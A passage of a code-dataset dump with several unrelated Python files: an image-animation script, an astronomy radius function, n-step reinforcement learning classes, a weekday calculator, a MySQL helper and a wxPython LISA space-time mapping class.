paired_dataset import PairedDataset\nfrom logger import Logger, Visualizer\nimport imageio\nimport numpy as np\n\nfrom sync_batchnorm import DataParallelWithCallback\nfrom normalize_kp import normalize_kp\n\ndef animate(config, generator, kp_detector, checkpoint, log_dir, dataset):\n log_dir = os.path.join(log_dir, 'animation')\n png_dir = os.path.join(log_dir, 'png')\n animate_params = config['animate_params']\n\n dataset = PairedDataset(initial_dataset=dataset, number_of_pairs=animate_params['num_pairs'])\n dataloader = DataLoader(dataset, batch_size=1, shuffle=False, num_workers=1)\n\n if checkpoint is not None:\n Logger.load_cpk(checkpoint, generator=generator, kp_detector=kp_detector)\n else:\n raise AttributeError(\"Checkpoint should be specified for mode='animate'.\")\n\n if not os.path.exists(log_dir):\n os.makedirs(log_dir)\n\n if not os.path.exists(png_dir):\n os.makedirs(png_dir)\n\n if torch.cuda.is_available():\n generator = DataParallelWithCallback(generator)\n kp_detector = DataParallelWithCallback(kp_detector)\n\n generator.eval()\n kp_detector.eval()\n\n for it, x in tqdm(enumerate(dataloader)):\n with torch.no_grad():\n predictions = []\n visualizations = []\n\n driving_video = x['driving_video']\n source_frame = x['source_video'][:, :, 0, :, :]\n\n kp_source = kp_detector(source_frame)\n kp_driving_initial = kp_detector(driving_video[:, :, 0])\n\n for frame_idx in range(driving_video.shape[2]):\n driving_frame = driving_video[:, :, frame_idx]\n kp_driving = kp_detector(driving_frame)\n kp_norm = normalize_kp(kp_source=kp_source, kp_driving=kp_driving,\n kp_driving_initial=kp_driving_initial, **animate_params['normalization_params'])\n out = generator(source_frame, kp_source=kp_source, kp_driving=kp_norm)\n\n out['kp_driving'] = kp_driving\n out['kp_source'] = kp_source\n out['kp_norm'] = kp_norm\n\n del out['sparse_deformed']\n\n predictions.append(np.transpose(out['prediction'].data.cpu().numpy(), [0, 2, 3, 1])[0])\n\n visualization = Visualizer(**config['visualizer_params']).visualize(source=source_frame,\n driving=driving_frame, out=out)\n visualization = visualization\n visualizations.append(visualization)\n\n predictions = np.concatenate(predictions, axis=1)\n result_name = \"-\".join([x['driving_name'][0], x['source_name'][0]])\n imageio.imsave(os.path.join(png_dir, result_name + '.png'), (255 * predictions).astype(np.uint8))\n\n image_name = result_name + animate_params['format']\n imageio.mimsave(os.path.join(log_dir, image_name), visualizations)\n","repo_name":"Adjective-Object/first-order-motion-tk","sub_path":"animate.py","file_name":"animate.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"21293903200","text":"import numpy as np\n\ndef galactocentric(gal_ra, gal_dec, incl, pa, sn_ra, sn_dec):\n \"\"\"\n Calculate deprojected radii and projected angles in a disk. \n\n Parameters\n ----------\n gal_ra : float\n ra coord of the galactic center in degrees\n gal_dec : float\n dec coord of the galactic center in degrees\n incl : float\n galaxy inclination angle in degrees\n pa : float\n galaxy position angle in degrees\n sn_ra : float\n ra coord of the supernova in degrees\n sn_dec : float\n dec coord of the supernova in degrees\n \n Returns\n -------\n radius_deg : float\n galactocentric radius in degrees\n radius_arcsec : float\n galactocentric radius in arcseconds\n proj_ang : float\n projection angle in degrees (theta in (r,theta))\n \"\"\"\n\n # recast the ra and dec arrays in term of the center coordinates\n # arrays are now in degrees from the center\n # offsets in ra and dec on celestial sphere (might misbehave at poles)\n dx_deg = (sn_ra - gal_ra) * np.cos(np.deg2rad(gal_dec))\n dy_deg = sn_dec - gal_dec\n\n # rotation angle (rotate x-axis up to the major axis)\n rotangle = np.pi/2.0 - np.deg2rad(pa)\n\n # create deprojected coordinate grids\n # offsets after deprojection with the coordinates we are interested in\n deprojdx_deg = (dx_deg * np.cos(rotangle) +\n dy_deg * np.sin(rotangle))\n deprojdy_deg = (dy_deg * np.cos(rotangle) -\n dx_deg * np.sin(rotangle))\n deprojdy_deg /= np.cos(np.deg2rad(incl))\n\n # make map of deprojected distance from the center\n radius_deg = np.sqrt(deprojdx_deg**2 + deprojdy_deg**2)\n radius_arcsec = radius_deg * 3600\n \n # make map of angle w.r.t. position angle\n projang_deg = np.rad2deg(np.arctan2(deprojdy_deg, deprojdx_deg))\n\n return radius_deg, radius_arcsec, projang_deg\n","repo_name":"NessMayker/PythonFunctions","sub_path":"galactocentricRadius.py","file_name":"galactocentricRadius.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8463418364","text":"# Standard Libraries\nimport sys\nimport itertools\nfrom pathlib import Path\n\n# Third party libraries\nimport pandas as pd\nimport numpy as np\nfrom icecream import ic\n\n# Local imports\nfrom ..logs import logging\nfrom .tool_box import RLFunctions\n\nclass NStepFunctions(RLFunctions):\n \"\"\"\n \"\"\"\n def __init__(self) -> None:\n RLFunctions.__init__(self)\n self.logger = logging.getLogger(__name__)\n self.action_methods = {\n 'random': self.get_random_action, \n 'greedy': self.greedy}\n\n def compute_trajectory(self, action_method:str='random'):\n '''Create the past S, R from starting state to the terminal state'''\n # Get the starting state and first action of new epoch\n state = self.starting_state\n action = self.action_methods[action_method](state)\n states, actions, rewards, next_states, next_actions = [], [], [], [], []\n while not self.env.is_terminal_state(state): \n next_state = self.env.next_state_given_action(state, action)\n reward = self.env.grid[self.env.next_state_given_action(state, action)] - 1\n states.append(state)\n actions.append(action)\n rewards.append(reward)\n\n state = next_state\n action = self.action_methods[action_method](state)\n next_states.append(state)\n next_actions.append(action) \n return pd.DataFrame({\n 'state': states, 'action': actions, 'reward': rewards,\n 'next_state': next_states, 'next_action': next_actions}, \n index=range(1, len(states)+1))\n\n def compute_td_nstep_returns(self, df:pd.DataFrame):\n '''Compute the n-step returns from the trajectory'''\n horizon = self.n_step if self.n_step < df.shape[0] else df.shape[0]\n discounts = np.logspace(0, horizon+1, num=horizon+1, base=self.gamma, endpoint=False)[-horizon:]\n # Gt = []\n for index in reversed(df.index):\n nstep_df = df.loc[index+1:index+horizon, : ]\n G = np.sum(nstep_df.reward * discounts[:len(nstep_df.reward)])\n if index + self.n_step < df.shape[0]:\n G += self.gamma * self.env.grid[df.loc[index + self.n_step].state]\n\n # Update state value\n self.env.grid[df.loc[index].state] +=\\\n self.alpha * (G - self.env.grid[df.loc[index].state])\n return df\n\n def compute_sarsa_nstep_returns(self, df:pd.DataFrame, Q:np.array):\n '''Compute the n-step returns from the trajectory'''\n horizon = self.n_step if self.n_step < df.shape[0] else df.shape[0]\n discounts = np.logspace(0, horizon+1, num=horizon+1, base=self.gamma, endpoint=False)[-horizon:]\n\n for index in reversed(df.index):\n nstep_df = df.loc[index+1:index+horizon, : ]\n G = np.sum(nstep_df.reward * discounts[:len(nstep_df.reward)])\n if index + self.n_step < df.shape[0]:\n G += self.gamma *\\\n Q[self.env.all_states.index(df.loc[index + self.n_step, 'state'])][self.env.possible_actions.index(df.loc[index + self.n_step, 'action'])]\n\n # Update state value\n Q[self.env.all_states.index(df.loc[index, 'state'])][self.env.possible_actions.index(df.loc[index, 'action'])] +=\\\n self.alpha *\\\n (G - Q[self.env.all_states.index(df.loc[index, 'state'])][self.env.possible_actions.index(df.loc[index, 'action'])])\n return Q\n\n def compute_n_step_returns(self, df:pd.DataFrame, Q:np.array, E:np.array):\n '''Compute the n-step returns from the trajectory'''\n # Taken by https://github.com/mimoralea/gdrl/blob/master/notebooks/chapter_06/chapter-06.ipynb\n # but my implementation my be wrong\n for index in reversed(df.index):\n td_target = df.loc[index, 'reward'] + self.gamma *\\\n Q[self.env.all_states.index(df.loc[index, 'next_state'])][self.env.possible_actions.index(df.loc[index, 'next_action'])]\n td_error = td_target -\\\n Q[self.env.all_states.index(df.loc[index, 'state'])][self.env.possible_actions.index(df.loc[index, 'action'])]\n\n E[self.env.all_states.index(df.loc[index, 'state'])][self.env.possible_actions.index(df.loc[index, 'action'])] =\\\n E[self.env.all_states.index(df.loc[index, 'state'])][self.env.possible_actions.index(df.loc[index, 'action'])] + 1\n \n Q = Q + self.alpha * td_error * E\n return Q\n\nclass NStepTD(NStepFunctions):\n '''\n n-step TD for estimating vi=vi*\n Reference:\n --------------------\n - Reinforcement Learning: An Introduction. Sutton and Barto. 2nd Edition. Page 144.\n '''\n def __init__(\n self, env, alpha:float = 0.5, gamma:float = 0.9, starting_state:tuple=None,\n num_of_epochs:int = 1_000, n_step = 1):\n \"\"\"\n Initializes the grid world\n - env: grid_environment: A tabular environment created by Make class\n - gamma: discount_factor, float: discount factor\n - num_of_epochs: int: number of epochs \n \"\"\"\n NStepFunctions.__init__(self)\n self.env = env\n self.alpha = alpha\n self.n_step = n_step\n self.gamma = gamma\n self.num_of_epochs = num_of_epochs\n self.starting_state = env.initial_state if starting_state is None else starting_state\n\n def compute_state_value(self):\n for epoch in range(self.num_of_epochs):\n if epoch % 100 == 0:\n self.logger.info(f'Epoch {epoch}')\n self.env.render_state_value()\n\n ## 1. Create Path\n trajectory_df = self.compute_trajectory()\n\n ## 2. Compute return\n self.compute_td_nstep_returns(trajectory_df)\n\n\nclass NStepSARSA(NStepFunctions):\n '''\n n-step Sarsa for estimating Q==q* or q_{pi}\n Reference:\n --------------------\n - Reinforcement Learning: An Introduction. Sutton and Barto. 2nd Edition. Page 147.\n '''\n def __init__(\n self, env, alpha:float = 0.5, gamma:float = 0.9, starting_state:tuple=None,\n epsilon:float=.1, num_of_epochs:int = 1_000, n_step = 1):\n \"\"\"\n - env: grid_environment: A tabular environment created by Make class\n - gamma: discount_factor, float: discount factor\n - num_of_epochs: int: number of epochs \n \"\"\"\n NStepFunctions.__init__(self)\n self.env = env\n self.alpha = alpha\n self.n_step = n_step\n self.epsilon = epsilon\n self.gamma = gamma\n self.num_of_epochs = num_of_epochs\n self.starting_state = env.initial_state if starting_state is None else starting_state\n\n def compute_state_value(self):\n Q = np.zeros((len(self.env.all_states), len(self.env.possible_actions)), dtype=np.float64)\n E = np.zeros((len(self.env.all_states), len(self.env.possible_actions)), dtype=np.float64)\n for epoch in range(self.num_of_epochs):\n if epoch % 100 == 0:\n self.logger.info(f'Epoch {epoch}')\n self.env.render_state_value()\n\n E.fill(0)\n ## 1. Create Path\n trajectory_df = self.compute_trajectory(action_method='greedy')\n\n ## 2. Compute Q\n # Q = self.compute_n_step_returns(trajectory_df, Q, E)\n Q = self.compute_sarsa_nstep_returns(trajectory_df, Q)\n\n final_q = pd.DataFrame(\n data=Q,\n index=self.env.all_states,\n columns=self.env.possible_actions)\n \n self.drew_policy(final_q, plot_name='sarsa')\n \n\nclass NStepOffPolicySARSA(NStepFunctions):\n '''\n Reference:\n --------------------\n - Reinforcement Learning: An Introduction. Sutton and Barto. 2nd Edition. Page 149.\n '''\n pass\n\nclass NStepTreeBackup(NStepFunctions):\n '''\n Reference:\n --------------------\n - Reinforcement Learning: An Introduction. Sutton and Barto. 2nd Edition. Page 155.\n '''\n pass\n\nclass OffPolicyNStepQSigma(NStepFunctions):\n '''\n Reference:\n --------------------\n - Reinforcement Learning: An Introduction. Sutton and Barto. 2nd Edition. Page 156.\n '''\n pass","repo_name":"MattiaCinelli/AlgoRL","sub_path":"algorl/src/Nstep.py","file_name":"Nstep.py","file_ext":"py","file_size_in_byte":8210,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"34873803393","text":"def getDayName(date, month, year):\n months = {'jan': 0, 'feb': 3, 'mar': 3, 'apr': 6, 'may': 1, 'jun': 4, 'jul': 6, 'aug': 2,\n 'sep': 5, 'oct': 0, 'nov': 3, 'dec': 5}\n\n days = {0: 'sunday', 1: 'monday', 2: 'tuesday', 3: 'wednesday', 4: 'thursday', 5: 'friday', 6: 'saturday'}\n\n sum = date + months[month] + (year - 1900) + ((year - 1900) // 4)\n\n return days[sum % 7]\n\n\nif __name__ == \"__main__\":\n date, month, year = input(\"Enter a date of month of a year(ex: 22 apr 1996):\\n\").split(\" \")\n date, month, year = int(date), str(month).lower(), int(year)\n print(getDayName(date, month, year).capitalize())\n\n","repo_name":"tohfaakib/Fun-With-Python","sub_path":"findingDayNameOfAnyDateOfAnyYear.py","file_name":"findingDayNameOfAnyDateOfAnyYear.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40971713282","text":"import pymysql, re, time\nfrom threading import Thread\nfrom colorama import init, Fore, Back, Style\nfrom urllib.parse import quote, unquote\nfrom sys import exit\nfrom urllib.parse import quote\n\nclass Database(object):\n def __init__(self, user, password, database):\n try:\n init()\n self.db = pymysql.connect (\n host=\"127.0.0.1\",\n port=3306,\n user=user,\n password=password,\n db=database\n )\n self.cursor = self.db.cursor()\n except Exception as e:\n print(Fore.RED + \"INDEX error 0x1:\")\n print(e)\n print(Style.RESET_ALL)\n exit()\n\n def getData(self, numberOfLinks=10):\n self.cursor.execute(\"SELECT ID, indexed FROM queue WHERE url like '%:%' AND visited>-1 LIMIT \" + str(numberOfLinks) + \";\")\n result = self.cursor.fetchall()\n for row in result:\n self.execute(\"UPDATE queue SET visited=-1 WHERE ID=\"+str(row[0])+\";\")\n return result\n\n def execute(self, command):\n try:\n self.cursor.execute(command)\n self.db.commit()\n return True\n except Exception as e:\n print('MySQL executing error', str(e))\n return False\n\n def close(self):\n self.cursor.close()\n self.db.close()\n","repo_name":"jappe999/WebScraper","sub_path":"reduce_db/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":1416,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"17704106271","text":"__author__ = \"Xun Li \"\n__all__ = [\"LISASpaceTimeMap\", \"LISASpaceTimeQueryDialog\", \"ShowLISASpaceTimeMap\"]\n\nimport os,math, datetime\nimport wx\nimport numpy as np\nimport pysal\n\nimport stars\nfrom ShapeMap import *\nfrom DynamicLisaMap import DynamicLISAMap, DynamicLISAQueryDialog\nfrom stars.visualization.DynamicControl import DynamicMapControl\nfrom stars.visualization.DynamicWidget import DynamicMapWidget\nfrom stars.visualization.PlotWidget import PlottingCanvas\nfrom stars.visualization import PlotWidget, AbstractData\nfrom stars.visualization.utils import View2ScreenTransform, GetDateTimeIntervals, FilterShapeList\nfrom stars.visualization.plots.LISATrendGraph import LISATrendGraph\nfrom stars.visualization.dialogs import TimeWeightsDlg\n\nclass LISASpaceTimeMap(ShapeMap):\n \"\"\"\n \"\"\"\n def __init__(self, parent, layers, **kwargs):\n ShapeMap.__init__(self,parent, layers)\n \n try:\n self.weight_file = kwargs[\"weight\"]\n self.cs_data_dict = kwargs[\"query_data\"]\n self.bufferWidth, self.bufferHeight = kwargs[\"size\"]\n self.step, self.step_by = kwargs[\"step\"] ,kwargs[\"step_by\"]\n self.start_date, self.end_date = kwargs[\"start\"],kwargs[\"end\"]\n \n self.nav_left = None\n self.nav_right = None\n self.bStrip = True\n \n # preprocessing parameters \n self.parent = parent\n self.layer = layers[0]\n self.data_sel_keys = sorted(self.cs_data_dict.keys())\n self.data_sel_values = [self.cs_data_dict[i] for i in self.data_sel_keys]\n self.weight = pysal.open(self.weight_file).read()\n self.t = len(self.cs_data_dict) # number of data slices\n self.n = len(self.data_sel_values[0]) # number of shape objects\n \n self.extent = self.layer.extent\n self.view = View2ScreenTransform(\n self.extent, \n self.bufferWidth, \n self.bufferHeight - self.bufferHeight/3.0\n ) \n \n self.datetime_intervals, self.interval_labels = GetDateTimeIntervals(self.start_date, self.end_date,self.t, self.step, self.step_by)\n self.setupDynamicControls()\n self.parentFrame.SetTitle('LISA Space Time Map-%s' % self.layer.name)\n self.dynamic_control = DynamicMapControl(self.parentFrame,self.t+1,self.updateDraw)\n \n self.trendgraphWidget = None\n self.popupTrendGraph = None\n \n # preprocessing LISA SpaceTime maps\n self.processLISASpaceTimeMap()\n \n except Exception as err:\n self.ShowMsgBox(\"\"\"LISA Space Time map could not be created. Please check or create new spatial and/or time weights files.\"\"\")\n self.UnRegister()\n self.parentFrame.Close(True)\n if os.name == 'nt':\n self.Destroy()\n return None\n \n def OnClose(self, event):\n self.UnRegister()\n if self.trendgraphWidget:\n self.trendgraphWidget.Close(True)\n if self.popupTrendGraph:\n self.popupTrendGraph.Close(True)\n event.Skip()\n \n def setupDynamicControls(self):\n \"\"\"\n assign labels of dynamic controls\n \"\"\"\n self.parentWidget = self.parent.GetParent()\n self.slider = self.parentWidget.animate_slider\n if isinstance(self.start_date, datetime.date):\n self.parentWidget.label_start.SetLabel('%2d/%2d/%4d'% (self.start_date.day,self.start_date.month,self.start_date.year))\n self.parentWidget.label_end.SetLabel('%2d/%2d/%4d'% (self.end_date.day,self.end_date.month,self.end_date.year))\n else:\n self.parentWidget.label_start.SetLabel('%d'% self.start_date)\n self.parentWidget.label_end.SetLabel('%4d'% self.end_date)\n self.parentWidget.label_current.SetLabel('current: %d (%d-%s period)' % (1,self.step, self.step_by))\n \n def processLISASpaceTimeMap(self):\n from stars.core.LISAWrapper import call_lisa\n \n # promote for time weights\n tw_dlg = TimeWeightsDlg(self.main, self.t, self.layer.name)\n tw_path = tw_dlg.Show()\n if tw_path == False:\n raise Exception(\"no time weights\")\n \n timeWeights = pysal.open(tw_path).read()\n self.timeNeighbors = timeWeights.neighbors\n \n # time LISA\n self.tseries_data = {}\n for pid in range(self.n):\n tseries = []\n for tid in range(self.t):\n tseries.append(self.cs_data_dict[tid][pid])\n self.tseries_data[pid] = tseries\n \n self.time_moran_locals = {}\n for pid in range(self.n):\n tseries = self.tseries_data[pid]\n localMoran, sigLocalMoran, sigFlag, clusterFlag = call_lisa(tseries,str(tw_path),499)\n ml = [localMoran, sigLocalMoran, sigFlag, clusterFlag]\n self.time_moran_locals[pid] = ml\n \n # show LISA trend graph\n trendgraphWidget = PlotWidget(\n self, \n self.layer, \n [self.tseries_data,self.time_moran_locals, self.timeNeighbors,[]],\n LISATrendGraph, \n pos = (self.parentFrame.Position[0] + self.parentFrame.Size[0], self.parentFrame.Position[1]),\n title=\"Trend Graph Plot for Time LISA (%s): %s\"%(self.t, self.layer.name)\n )\n trendgraphWidget.Show()\n self.trendgraphWidget = trendgraphWidget\n\n # space LISA\n self.space_moran_locals = dict()\n for tid,data in self.cs_data_dict.iteritems():\n localMoran, sigLocalMoran, sigFlag, clusterFlag = call_lisa(data,str(self.weight_file),499)\n ml = [localMoran, sigLocalMoran, sigFlag, clusterFlag]\n self.space_moran_locals[tid] = ml\n \n # default color schema for LISA\n self.lisa_color_group =[\n stars.LISA_NOT_SIG_COLOR, \n stars.LISA_HH_COLOR,\n stars.LISA_LL_COLOR, \n stars.LISA_LH_COLOR,\n stars.LISA_HL_COLOR, \n stars.LISA_OBSOLETE_COLOR\n ]\n label_group = [\"Not Significant\",\"High-High\",\"Low-Low\",\"Low-High\",\"High-Low\",\"Neighborless\"]\n self.color_schema_dict[self.layer.name] = ColorSchema(self.lisa_color_group,label_group)\n \n self.internalLISA = False\n \n # inital drawing markov lisa map\n self.updateDraw(0)\n \n # Thread-based controller for dynamic LISA\n self.dynamic_control = DynamicMapControl(self.parentFrame,self.t,self.updateDraw) \n \n def draw_selected_by_ids(self, shape_ids_dict, dc=None):\n super(LISASpaceTimeMap, self).draw_selected_by_ids(shape_ids_dict,dc)\n \n self.selected_shape_ids = shape_ids_dict\n if self.internalLISA:\n self.draw_popup(dc)\n \r\n def draw_selected_by_region(self,dc, region, \n isEvtResponse=False, \n isScreenCoordinates=False):\n if self.internalLISA:\n self.draw_popup(dc, region)\n \n super(LISASpaceTimeMap, self).draw_selected_by_region(\n dc, region, isEvtResponse, isScreenCoordinates)\n \n def showInternalPopupTimeLISA(self, event):\n self.internalLISA = not self.internalLISA\n \n if self.internalLISA == False:\n if self.popupTrendGraph != None:\n self.popupTrendGraph.Close(True)\n self.popupTrendGraph = None\n \n def showExtPopupTimeLISA(self, event):\n self.internalLISA = False\n \n # show LISA trend graph\n if self.trendgraphWidget == None or isinstance(self.trendgraphWidget, wx._core._wxPyDeadObject):\n self.trendgraphWidget = PlotWidget(\n self, \n self.layer, \n [self.tseries_data,self.time_moran_locals, self.timeNeighbors,[]],\n LISATrendGraph, \n pos = (self.parentFrame.Position[0] + self.parentFrame.Size[0], self.parentFrame.Position[1]),\n title=\"Trend Graph Plot for Time Gi*(%s): %s\"%(self.t, self.layer.name)\n )\n self.trendgraphWidget.Show()\n self.trendgraphWidget.SetFocus()\n \n def draw_popup(self, dc, region=None):\n if self.popupTrendGraph != None:\n self.popupTrendGraph.Close(True)\n self.popupTrendGraph = None\n \n if len(self.selected_shape_ids) == 0:\n return\n \n selected_ids = []\n if self.layer.name in self.selected_shape_ids:\n selected_ids = self.selected_shape_ids[self.layer.name]\n \n trendgraph_data = dict()\n for i in range(self.n):\n data = []\n for j in range(self.t):\n data.append(self.cs_data_dict[j][i])\n trendgraph_data[i] = data\n \n self.popupTrendGraph= LISATrendGraph(\n self.parent, \n self.layer,\n [self.tseries_data,self.time_moran_locals, self.timeNeighbors,selected_ids]\n )\n self.popupTrendGraph.Hide()\n \n if region:\n x,y = region[2],region[3]\n else:\n x,y = self.layer.centroids[selected_ids[0]][0]\n x,y = self.view.view_to_pixel(x,y)\n x,y = int(x),int(y)\n w = int(math.ceil(self.bufferWidth * 0.5))\n if w < 300: \n w = 300\n if w > 450: \n w = 450\n h = w * 0.7\n if x + w > self.bufferWidth: \n if x - w > 0:\n x = x - w\n else:\n x = self.bufferWidth - w\n if y + h > self.bufferHeight: \n if y - h > 0:\n y = y - h\n else:\n y = self.bufferHeight - h\n \n dc.SetPen(wx.TRANSPARENT_PEN)\n dc.SetBrush(wx.Brush(wx.Color(120,120,120,160)))\n dc.DrawRectangle(x+5,y+h, w, 5)\n dc.DrawRectangle(x+w,y+5, 5, h)\n dc.SetPen(wx.Pen(wx.Color(100,100,100,100)))\n dc.SetBrush(wx.TRANSPARENT_BRUSH)\n dc.DrawRectangle(x,y,w,h)\n \n self.popupTrendGraph.bufferWidth = w\n self.popupTrendGraph.bufferHeight = h\n self.popupTrendGraph.buffer = wx.EmptyBitmapRGBA(w,h,255,255,255,222)\n tmp_dc = wx.BufferedDC(None, self.popupTrendGraph.buffer)\n if not 'Linux' in stars.APP_PLATFORM \\\n and 'Darwin' != stars.APP_PLATFORM:\r\n tmp_dc = wx.GCDC(tmp_dc)\n self.popupTrendGraph.DoDraw(tmp_dc)\n dc.DrawBitmap(self.popupTrendGraph.buffer,x,y)\n \n \n def OnSize(self,event):\n \"\"\"\n overwrite OnSize in ShapeMap.py\n \"\"\"\n self.bufferWidth,self.bufferHeight = self.GetClientSize()\n if self.bufferHeight > 0:\n if self.bStrip == False:\n self.view.pixel_height = self.bufferHeight\n else:\n self.view.pixel_height = self.bufferHeight - self.bufferHeight/3.0\n self.view.pixel_width = self.bufferWidth\n self.view.init()\n if self.bStrip: \n self.stripBuffer = None\n self.reInitBuffer = True\r\n \n def OnMotion(self, event):\n \"\"\"\n \"\"\"\n if self.bStrip:\n mouse_end_x, mouse_end_y = (event.GetX(), event.GetY())\n # check for left\n if self.nav_left:\n if self.nav_left[0] <= mouse_end_x <= self.nav_left[2] and \\\n self.nav_left[1] <= mouse_end_y <= self.nav_left[3]:\n return\n # determine for right \n if self.nav_right:\n if self.nav_right[0] <= mouse_end_x <= self.nav_right[2] and \\\n self.nav_right[1] <= mouse_end_y <= self.nav_right[3]:\n return\n \n if event.Dragging() and event.LeftIsDown() and self.isMouseDrawing:\n x, y = event.GetX(), event.GetY() \n # while mouse is down and moving\n if self.map_operation_type == stars.MAP_OP_PAN:\n # disable PAN (not support in this version)\n return\n \n # give the rest task to super class\n super(LISASpaceTimeMap,self).OnMotion(event)\n \n def Update(self, tick):\n \"\"\"\n When SLIDER is dragged\n \"\"\"\n self.updateDraw(tick) \n\n def updateDraw(self,tick):\n \"\"\"\n Called for dynamic updating the map content\n \"\"\"\n self.tick = tick\n ml = self.space_moran_locals[tick]\n \n # 0 not significant, 1 HH, 2 LL, 3 LH, 4 HL, 5 Neighborless\n sigFlag = ml[2]\n clusterFlag = ml[3]\n lm_sig = np.array(sigFlag)\n lm_q = np.array(clusterFlag)\n id_groups = [[] for i in range(6)]\n for i,sig in enumerate(lm_sig):\n if sig > 0:\n id_groups[lm_q[i]].append(i)\n else:\n id_groups[0].append(i)\n self.id_groups = id_groups\n self.draw_layers[self.layer].set_data_group(id_groups)\n self.draw_layers[self.layer].set_fill_color_group(self.lisa_color_group)\n \n edge_clr = self.color_schema_dict[self.layer.name].edge_color\r\n self.draw_layers[self.layer].set_edge_color(edge_clr)\n \n # trigger to draw \n self.reInitBuffer = True \n self.parentWidget.label_current.SetLabel('current: %d (%d-%s period)' % (tick+1,self.step, self.step_by))\n \n def DoDraw(self, dc):\n \"\"\"\n Overwrite this function from base class for customized drawing\n \"\"\"\n super(LISASpaceTimeMap, self).DoDraw(dc)\n \n if self.bStrip:\n self.drawStripView(dc)\n \n def OnLeftUp(self, event):\n \"\"\" override for click on strip view \"\"\"\n if self.bStrip:\n mouse_end_x, mouse_end_y = (event.GetX(), event.GetY())\n # check for left\n if self.nav_left:\n if self.nav_left[0] <= mouse_end_x <= self.nav_left[0] + self.nav_left[2] and \\\n self.nav_left[1] <= mouse_end_y <= self.nav_left[1] + self.nav_left[3]:\n self.tick = self.tick -1 if self.tick>0 else 0\n self.updateDraw(self.tick)\n # determine for right \n if self.nav_right:\n if self.nav_right[0] <= mouse_end_x <= self.nav_right[0] + self.nav_right[2] and \\\n self.nav_right[1] <= mouse_end_y <= self.nav_right[1] + self.nav_right[3]:\n self.tick = self.tick +1 if self.tick<=self.n else self.tick\n self.updateDraw(self.tick)\n \n # give the rest task to super class\n super(LISASpaceTimeMap,self).OnLeftUp(event)\n \n def drawStripView(self,dc):\n \"\"\"\n For each LISA map at T_i, two related LISA maps at \n T_(i-1) ant T_(i+1) will be displayed in this strip area\n \"\"\"\n n = len(self.data_sel_keys)\n if n <= 1:\n return\n \n start = self.tick\n if start+2 > n:\n return\n end = start + 2\n \n # flag for drawing navigation arrow\n b2LeftArrow = True if self.tick > 0 else False\n b2RightArrow = True if self.tick < n-2 else False\n \n # at area: 0,self.bufferHeight * 2/3.0\n # draw a light gray area at the bottom first\n font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)\n dc.SetFont(font)\n dc.SetPen(wx.TRANSPARENT_PEN)\n brush = wx.Brush(stars.STRIP_VIEW_BG_COLOR)\n dc.SetBrush(brush)\n framePos = 0, self.bufferHeight * 2.0/3.0\n dc.DrawRectangle(framePos[0],framePos[1], self.bufferWidth, self.bufferHeight/3.0)\n \n # calculate width and height for each bmp\n bmpFrameWidth = self.bufferWidth / 2.0 # frame is divided into 2 parts\n bmpFrameHeight = self.bufferHeight / 3.0\n bmpWidth = bmpFrameWidth * 0.6\n bmpHeight = bmpFrameHeight * 0.8\n bmpOffsetX = (bmpFrameWidth - bmpWidth )/2.0 \n bmpOffsetY = (bmpFrameHeight- bmpHeight)/2.0 \n\n # draw text for center large graph\n start_date, end_date = self.datetime_intervals[self.tick]\n if isinstance(start_date, datetime.date):\n info_tip = \"t%d:(%d/%d/%d-%d/%d/%d)\" % \\\n (self.tick+1,start_date.month,start_date.day,start_date.year,\n end_date.month, end_date.day, end_date.year)\n else:\n info_tip = \"t%d - t%d\" % (start_date, end_date)\n txt_w,txt_h = dc.GetTextExtent(info_tip)\r\n dc.DrawText(info_tip, (self.bufferWidth - txt_w)/2, framePos[1] - txt_h)\n \n \n # draw two related LISA maps in strip area\n dc.SetBrush(wx.Brush(stars.STRIP_VIEW_MAP_BG_COLOR))\n #for i in range(start, end):\n if self.tick - 1 >= 0:\n start_pos = bmpOffsetX, framePos[1]+bmpOffsetY \n dc.DrawRectangle(start_pos[0], start_pos[1], bmpWidth, bmpHeight)\n bmp = wx.EmptyBitmapRGBA(\n bmpFrameWidth, bmpFrameHeight,\n red = stars.STRIP_VIEW_BG_COLOR.red,\n green = stars.STRIP_VIEW_BG_COLOR.green,\n blue = stars.STRIP_VIEW_BG_COLOR.blue,\n alpha = stars.STRIP_VIEW_BG_COLOR.alpha\n )\n bmp = self.drawSubLISAMap(self.tick-1,bmpWidth, bmpHeight, bmp)\n dc.DrawBitmap(bmp, start_pos[0], start_pos[1])\n start_date, end_date = self.datetime_intervals[self.tick-1]\n if isinstance(start_date, datetime.date):\n info_tip = \"t%d:(%d/%d/%d-%d/%d/%d)\" % \\\n (self.tick,start_date.month,start_date.day,start_date.year,\n end_date.month, end_date.day, end_date.year)\n else:\n info_tip = \"t%d - t%d\" % (start_date, end_date)\n txt_w,txt_h = dc.GetTextExtent(info_tip)\r\n dc.DrawText(info_tip, start_pos[0] + (bmpWidth - txt_w)/2, start_pos[1]+bmpHeight+2)\n \n if self.tick + 1 < self.t:\n start_pos = bmpFrameWidth + bmpOffsetX , framePos[1]+bmpOffsetY \n dc.DrawRectangle(start_pos[0], start_pos[1], bmpWidth, bmpHeight)\n bmp = wx.EmptyBitmapRGBA(\n bmpFrameWidth, bmpFrameHeight,\n red = stars.STRIP_VIEW_BG_COLOR.red,\n green = stars.STRIP_VIEW_BG_COLOR.green,\n blue = stars.STRIP_VIEW_BG_COLOR.blue,\n alpha = stars.STRIP_VIEW_BG_COLOR.alpha\n )\n bmp = self.drawSubLISAMap(self.tick+1,bmpWidth, bmpHeight, bmp)\n dc.DrawBitmap(bmp, start_pos[0], start_pos[1])\n start_date, end_date = self.datetime_intervals[self.tick+1]\n if isinstance(start_date, datetime.date):\n info_tip = \"t%d:(%d/%d/%d-%d/%d/%d)\" % \\\n (self.tick+2,start_date.month,start_date.day,start_date.year,\n end_date.month, end_date.day, end_date.year)\n else:\n info_tip = \"t%d - t%d\" % (start_date, end_date)\n txt_w,txt_h = 